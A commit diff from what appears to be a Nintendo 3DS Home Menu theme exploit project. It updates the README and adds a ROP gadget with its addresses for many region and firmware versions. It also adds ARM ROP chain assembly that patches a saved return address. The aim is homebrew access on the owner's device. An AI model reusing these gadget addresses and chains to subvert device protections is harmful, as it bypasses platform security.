Finally return to the Home Menu code properly, without state initiali…

…zation being skipped. This fixes issue #3. This also fixes using the THEMEDATA_PATH build option: gfx is now displayed correctly with that. Added the ROP_STR_R0TOR1 gadget and updated README.

README.md

@@ -1,9 +1,9 @@
 # Summary
 When the Home Menu is starting up, it can load theme-data from the home-menu theme SD extdata. The flaw can be triggered from here. The ROP starts running at roughly the same time the LCD backlight gets turned on.
 
-Although this triggers during Home Menu boot, this can't cause any true bricks: just remove the *SD card if any booting issues ever occur(or delete/rename the theme-cache extdata directory). Note that this also applies when the ROP causes a crash, like when the ROP is for a different version of Home Menu(this can also happen if you boot into a nandimage which has a different Home Menu version, but still uses the exact same SD data). However, it seems that normally(?) Home Menu crashes with this just result in Home Menu displaying the usual error dialog for system-applet crashes.
+Although this triggers during Home Menu boot, this can't cause any true bricks: just remove the *SD card if any booting issues ever occur(or delete/rename the theme-cache extdata directory). Note that this also applies when the ROP causes a crash, like when the ROP is for a different version of Home Menu(this can also happen if you boot into a nandimage which has a different Home Menu version, but still uses the exact same SD data). In some(?) cases Home Menu crashes with this just result in Home Menu displaying the usual error dialog for system-applet crashes.
 
-Since this is a theme exploit, a normal theme can't be used unless you build with the THEMEDATA_PATH option below(the ROP runs a good while after the theme is loaded). Due to how this hax works, the theme is really only usable for BGM(as described below).
+Since this is a theme exploit, a normal theme can't be used unless you build with the THEMEDATA_PATH option below(the ROP runs a while after the theme is loaded).
 
 # Vuln
 This was discovered on December 22, 2014.
@@ -37,7 +37,7 @@ The initial release archive only supported USA, EUR, and JPN. The latest git als
 # Building
 Just run "make", or even "make clean && make". For building ROP binaries which can be used for general homemenu ROP, this can be used: "{make clean &&} make ropbins". "make bins" is the same as "make", except building the .lz is skipped.
 
-Before building, the menurop directories+files must be generated. "./generate_menurop_addrs.sh {path}". See the source of that script for details(this requires the Home Menu code-binaries). Note that the USA/EUR/JPN homemenu exefs:/.code binaries starting with system-version v9.2 are all identical(prior to v9.9), while USA/EUR binaries for v9.0 differs from the JPN versions. If you don't have the required Home Menu code-binaries, you can use the MENUROP_PATH option listed below.
+Before building, the menurop directories+files must be generated. "./generate_menurop_addrs.sh {path}". See the source of that script for details(this requires the Home Menu code-binaries). Note that the USA/EUR/JPN homemenu exefs:/.code binaries starting with system-version v9.2 are all identical(prior to v9.9), while USA/EUR binaries for v9.0 differs from the JPN versions. If you don't have the required Home Menu code-binaries, you can use the MENUROP_PATH option listed below(this is the recommended way to build this).
 
 The built files for BodyCache.bin/Body_LZ.bin are located under "themepayload/".
 
@@ -55,14 +55,14 @@ Build options:
 * "ENABLE_LOADROPBIN=1" Load a homemenu ropbin then stack-pivot to it, see the Makefile HEAPBUF_ROPBIN_* values for the load-address. When LOADSDPAYLOAD isn't used, the binary is the one specified by CODEBINPAYLOAD, otherwise it's loaded from "sd:/menuhax_ropbinpayload.bin". The binary size should be <=0x10000-bytes.
 * "ENABLE_HBLAUNCHER=1" When used with ENABLE_LOADROPBIN, setup the additional data needed by the hblauncher payload.
 * "MENUROP_PATH={path}" Use the specified path for the "menurop" directory, instead of the default one which requires running generate_menurop_addrs.sh. To use the prebuilt menurop headers included with this repo, the following can be used: "MENUROP_PATH=menurop_prebuilt".
-* "THEMEDATA_PATH={*decompressed* regular theme body_LZ filepath}" Build hax with the specified theme, instead of using the "default theme" one. When Home Menu starts the actual rendering however, the gfx for the theme doesn't display properly due to the hax. BGM works fine, therefore this should only used for BGM-only themes(where the themedata header is all-zero except for the version and BGM fields). Also note that compression during building takes a *lot* longer with this.
+* "THEMEDATA_PATH={*decompressed* regular theme body_LZ filepath}" Build hax with the specified theme, instead of using the "default theme" one. Also note that compression during building takes a *lot* longer with this.
 
 The build command used for the release archive is the following: make clean && time make LOADSDPAYLOAD=1 USE_PADCHECK=0x200 ENABLE_LOADROPBIN=1 ENABLE_HBLAUNCHER=1 LOADSDCFG_PADCHECK=1 MENUROP_PATH=menurop_prebuilt
 
 # Usage
 Just boot the system, the haxx will automatically trigger when Home Menu loads the theme-data from the cache in SD extdata. The ROP right after the ROP for USE_PADCHECK, if that's even enabled, will overwrite the main-screen framebuffers with data from elsewhere, resulting in junk being displayed.
 
-When the ROP returns from the haxx to running the actual Home Menu code, such as when USE_PADCHECK is used where the current PAD state doesn't match the specified state, Home Menu will use the "theme" data from this hax: the end result is that it appears to use the same theme as the default one.
+When the ROP returns from the haxx to running the actual Home Menu code, such as when USE_PADCHECK is used where the current PAD state doesn't match the specified state, Home Menu will use the "theme" data from this hax: the end result is that it appears to use the same theme as the default one(when the THEMEDATA_PATH build option wasn't used).
 
 When built with ENABLE_LOADROPBIN=1, this can boot into the homebrew-launcher if the ropbin listed above is one for the homebrew-launcher and was pre-patched.
 

homemenu_ropgadget_script

@@ -10,6 +10,7 @@
 --patterndata=06875506f101dd62c4b8877e77b51fd2d0e58c09c6f1b165865949fe4ac6128d --patternsha256size=0x4 "--plainout=#define POP_R4R5R6PC "
 
 --patterndata=d6fdb6fb53b97ea0ffdf9e38f755ba28aa6bc13990292a8f10d4d3904cb10c33 --patternsha256size=0x8 "--plainout=#define ROP_STR_R1TOR0 "
+--patterndata=17f19cd8b8896468edbad52b1a47862f432c6f7b119e7f5b2f4458d3a9009795 --patternsha256size=0x8 "--plainout=#define ROP_STR_R0TOR1 "
 --patterndata=b77067177e2cd4f7aab57202cca9d6a8fff0ef2551d1d0367b58c2cafdf2d8d0 --patternsha256size=0x8 "--plainout=#define ROP_LDR_R0FROMR0 "
 --patterndata=aa6a623d7c3291340160fd74738249e68b3b4ac2b59cd2c9b5846adcfefb702f --patternsha256size=0xc "--plainout=#define ROP_LDRR1R1_STRR1R0 "
 --patterndata=783e1007d4808f89c1b1fde53a71dd6fff0d9cd7eb59cee7fb0993e1bb1aae38 --patternsha256size=0x8 "--plainout=#define ROP_MOVR1R3_BXIP "

menurop_prebuilt/EUR/11272

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b90
 
 #define ROP_STR_R1TOR0 0x00103f40
+#define ROP_STR_R0TOR1 0x00102960
 #define ROP_LDR_R0FROMR0 0x0010efe8
 #define ROP_LDRR1R1_STRR1R0 0x001f1ee4
 #define ROP_MOVR1R3_BXIP 0x001b8848

menurop_prebuilt/EUR/12288

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b90
 
 #define ROP_STR_R1TOR0 0x00103f40
+#define ROP_STR_R0TOR1 0x00102960
 #define ROP_LDR_R0FROMR0 0x0010efe8
 #define ROP_LDRR1R1_STRR1R0 0x001f1e7c
 #define ROP_MOVR1R3_BXIP 0x001b8708

menurop_prebuilt/EUR/13330

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b94
 
 #define ROP_STR_R1TOR0 0x00103f58
+#define ROP_STR_R0TOR1 0x0010297c
 #define ROP_LDR_R0FROMR0 0x0010f01c
 #define ROP_LDRR1R1_STRR1R0 0x002003bc
 #define ROP_MOVR1R3_BXIP 0x001c2e24

menurop_prebuilt/EUR/14336

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b94
 
 #define ROP_STR_R1TOR0 0x00103f58
+#define ROP_STR_R0TOR1 0x0010297c
 #define ROP_LDR_R0FROMR0 0x0010f01c
 #define ROP_LDRR1R1_STRR1R0 0x002003bc
 #define ROP_MOVR1R3_BXIP 0x001c2e24

menurop_prebuilt/EUR/15360

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b94
 
 #define ROP_STR_R1TOR0 0x00103f58
+#define ROP_STR_R0TOR1 0x0010297c
 #define ROP_LDR_R0FROMR0 0x0010f01c
 #define ROP_LDRR1R1_STRR1R0 0x002003a0
 #define ROP_MOVR1R3_BXIP 0x001c2e08

menurop_prebuilt/EUR/16404

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118d38
 #define ROP_LDRR1R1_STRR1R0 0x00213f9c
 #define ROP_MOVR1R3_BXIP 0x001ce768

menurop_prebuilt/EUR/17415

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118cdc
 #define ROP_LDRR1R1_STRR1R0 0x00213e64
 #define ROP_MOVR1R3_BXIP 0x001cec08

menurop_prebuilt/EUR/19456

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118d08
 #define ROP_LDRR1R1_STRR1R0 0x00213f6c
 #define ROP_MOVR1R3_BXIP 0x001cece4

menurop_prebuilt/EUR/20480

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118d08
 #define ROP_LDRR1R1_STRR1R0 0x00213f88
 #define ROP_MOVR1R3_BXIP 0x001ced00

menurop_prebuilt/JPN/13313

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b90
 
 #define ROP_STR_R1TOR0 0x00103f40
+#define ROP_STR_R0TOR1 0x00102960
 #define ROP_LDR_R0FROMR0 0x0010efe8
 #define ROP_LDRR1R1_STRR1R0 0x001f0a2c
 #define ROP_MOVR1R3_BXIP 0x001b7ac0

menurop_prebuilt/JPN/14336

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b90
 
 #define ROP_STR_R1TOR0 0x00103f40
+#define ROP_STR_R0TOR1 0x00102960
 #define ROP_LDR_R0FROMR0 0x0010efe8
 #define ROP_LDRR1R1_STRR1R0 0x001f1ee4
 #define ROP_MOVR1R3_BXIP 0x001b8848

menurop_prebuilt/JPN/15360

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b90
 
 #define ROP_STR_R1TOR0 0x00103f40
+#define ROP_STR_R0TOR1 0x00102960
 #define ROP_LDR_R0FROMR0 0x0010efe8
 #define ROP_LDRR1R1_STRR1R0 0x001f1e7c
 #define ROP_MOVR1R3_BXIP 0x001b8708

menurop_prebuilt/JPN/16402

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b94
 
 #define ROP_STR_R1TOR0 0x00103f58
+#define ROP_STR_R0TOR1 0x0010297c
 #define ROP_LDR_R0FROMR0 0x0010f01c
 #define ROP_LDRR1R1_STRR1R0 0x002003bc
 #define ROP_MOVR1R3_BXIP 0x001c2e24

menurop_prebuilt/JPN/17408

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b94
 
 #define ROP_STR_R1TOR0 0x00103f58
+#define ROP_STR_R0TOR1 0x0010297c
 #define ROP_LDR_R0FROMR0 0x0010f01c
 #define ROP_LDRR1R1_STRR1R0 0x002003bc
 #define ROP_MOVR1R3_BXIP 0x001c2e24

menurop_prebuilt/JPN/18432

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b94
 
 #define ROP_STR_R1TOR0 0x00103f58
+#define ROP_STR_R0TOR1 0x0010297c
 #define ROP_LDR_R0FROMR0 0x0010f01c
 #define ROP_LDRR1R1_STRR1R0 0x002003a0
 #define ROP_MOVR1R3_BXIP 0x001c2e08

menurop_prebuilt/JPN/19476

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118d38
 #define ROP_LDRR1R1_STRR1R0 0x00213f9c
 #define ROP_MOVR1R3_BXIP 0x001ce768

menurop_prebuilt/JPN/20487

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118cdc
 #define ROP_LDRR1R1_STRR1R0 0x00213e64
 #define ROP_MOVR1R3_BXIP 0x001cec08

menurop_prebuilt/JPN/22528

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118d08
 #define ROP_LDRR1R1_STRR1R0 0x00213f6c
 #define ROP_MOVR1R3_BXIP 0x001cece4

menurop_prebuilt/JPN/23552

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118d08
 #define ROP_LDRR1R1_STRR1R0 0x00213f88
 #define ROP_MOVR1R3_BXIP 0x001ced00

menurop_prebuilt/KOR/6166

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118d38
 #define ROP_LDRR1R1_STRR1R0 0x00213f2c
 #define ROP_MOVR1R3_BXIP 0x001ce758

menurop_prebuilt/KOR/7175

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118cdc
 #define ROP_LDRR1R1_STRR1R0 0x00213cc8
 #define ROP_MOVR1R3_BXIP 0x001cea94

menurop_prebuilt/KOR/8192

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118d08
 #define ROP_LDRR1R1_STRR1R0 0x00213d40
 #define ROP_MOVR1R3_BXIP 0x001ceae0

menurop_prebuilt/USA/11272

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b90
 
 #define ROP_STR_R1TOR0 0x00103f40
+#define ROP_STR_R0TOR1 0x00102960
 #define ROP_LDR_R0FROMR0 0x0010efe8
 #define ROP_LDRR1R1_STRR1R0 0x001f1ee4
 #define ROP_MOVR1R3_BXIP 0x001b8848

menurop_prebuilt/USA/12288

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b90
 
 #define ROP_STR_R1TOR0 0x00103f40
+#define ROP_STR_R0TOR1 0x00102960
 #define ROP_LDR_R0FROMR0 0x0010efe8
 #define ROP_LDRR1R1_STRR1R0 0x001f1e7c
 #define ROP_MOVR1R3_BXIP 0x001b8708

menurop_prebuilt/USA/13330

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b94
 
 #define ROP_STR_R1TOR0 0x00103f58
+#define ROP_STR_R0TOR1 0x0010297c
 #define ROP_LDR_R0FROMR0 0x0010f01c
 #define ROP_LDRR1R1_STRR1R0 0x002003bc
 #define ROP_MOVR1R3_BXIP 0x001c2e24

menurop_prebuilt/USA/14336

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b94
 
 #define ROP_STR_R1TOR0 0x00103f58
+#define ROP_STR_R0TOR1 0x0010297c
 #define ROP_LDR_R0FROMR0 0x0010f01c
 #define ROP_LDRR1R1_STRR1R0 0x002003bc
 #define ROP_MOVR1R3_BXIP 0x001c2e24

menurop_prebuilt/USA/15360

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b94
 
 #define ROP_STR_R1TOR0 0x00103f58
+#define ROP_STR_R0TOR1 0x0010297c
 #define ROP_LDR_R0FROMR0 0x0010f01c
 #define ROP_LDRR1R1_STRR1R0 0x002003a0
 #define ROP_MOVR1R3_BXIP 0x001c2e08

menurop_prebuilt/USA/16404

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118d38
 #define ROP_LDRR1R1_STRR1R0 0x00213f9c
 #define ROP_MOVR1R3_BXIP 0x001ce768

menurop_prebuilt/USA/17415

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118cdc
 #define ROP_LDRR1R1_STRR1R0 0x00213e64
 #define ROP_MOVR1R3_BXIP 0x001cec08

menurop_prebuilt/USA/19456

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118d08
 #define ROP_LDRR1R1_STRR1R0 0x00213f6c
 #define ROP_MOVR1R3_BXIP 0x001cece4

menurop_prebuilt/USA/20480

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118d08
 #define ROP_LDRR1R1_STRR1R0 0x00213e24
 #define ROP_MOVR1R3_BXIP 0x001cead4

menurop_prebuilt/USA/21504

@@ -10,6 +10,7 @@
 #define POP_R4R5R6PC 0x00101b74
 
 #define ROP_STR_R1TOR0 0x00104020
+#define ROP_STR_R0TOR1 0x00102968
 #define ROP_LDR_R0FROMR0 0x00118d08
 #define ROP_LDRR1R1_STRR1R0 0x00213e40
 #define ROP_MOVR1R3_BXIP 0x001ceaf0

themedata_payload.s

@@ -336,6 +336,44 @@ CALLFUNC_NOSP FS_MountSdmc, (HEAPBUF + (sd_archivename - _start)), 0, 0, 0
 #ifdef USE_PADCHECK
 PREPARE_RET2MENUCODE
 
+@ The below adds the saved LR value on stack used during RET2MENU, with a certain value. This basically subtracts the saved LR so that a function which was previously only executed with the themehax state, gets executed again with the real state this time. Without this, this particular function never gets executed with normal state, which broke various things.
+ROP_SETLR ROP_POPPC
+
+.word POP_R0PC
+.word (HEAPBUF + (rop_ret2menu_stack_lrval - _start)) @ r0
+
+.word POP_R1PC
+.word TARGETOVERWRITE_STACKADR+0xc @ r1
+
+.word ROP_LDRR1R1_STRR1R0 @ Copy the saved LR value on the stack which gets used during RET2MENU, to rop_ret2menu_stack_lrval.
+
+.word POP_R0PC
+rop_ret2menu_stack_lrval:
+.word 0
+
+.word POP_R1PC
+#if (REGIONVAL==0 && MENUVERSION>15360) || (REGIONVAL!=0 && REGIONVAL!=4 && MENUVERSION>12288) || (REGIONVAL==4)//Check for system-version >v9.2.
+.word 0xfffffff4
+#else
+.word 0xfffffff8
+#endif
+
+.word ROP_ADDR0_TO_R1 @ r0 = rop_ret2menu_stack_lrval + <above r1 value>
+
+.word POP_R1PC
+.word (HEAPBUF + (rop_ret2menu_stack_newlrval - _start))
+
+.word ROP_STR_R0TOR1 @ Write the above r0 value to rop_ret2menu_stack_newlrval.
+
+.word POP_R0PC
+.word TARGETOVERWRITE_STACKADR+0xc @ r0
+
+.word POP_R1PC
+rop_ret2menu_stack_newlrval:
+.word 0 @ r1
+
+.word ROP_STR_R1TOR0 @ Write the new LR value to the stack.
+
 #ifdef LOADSDCFG_PADCHECK
 @ Load the cfg file. Errors are ignored with file-reading.
 CALLFUNC_NOSP MEMSET32_OTHER, (HEAPBUF + (IFile_ctx - _start)), 0x20, 0, 0